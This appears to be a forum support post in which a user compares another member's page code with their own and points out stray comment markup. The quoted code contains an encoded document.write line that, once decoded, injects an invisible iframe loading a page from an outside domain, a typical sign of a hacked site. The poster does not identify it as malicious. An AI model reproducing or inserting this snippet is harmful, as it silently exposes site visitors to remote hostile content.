I just downloaded your page... line 323 is not an else statement. You have a "<!--" there and then you commented out the end of the commenting.
This is what you have:
Code:
// workaround for header redirect issue from forms with enctype in IE
// (use a scrollIntoView javascript call in the <body><!-- o --><script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script><!-- c --> onload event)
$onload = '';
My showthread has:
Code:
// workaround for header redirect issue from forms with enctype in IE
// (use a scrollIntoView javascript call in the <body> onload event)
$onload = '';
I don't know what the purpose of all that other stuff is.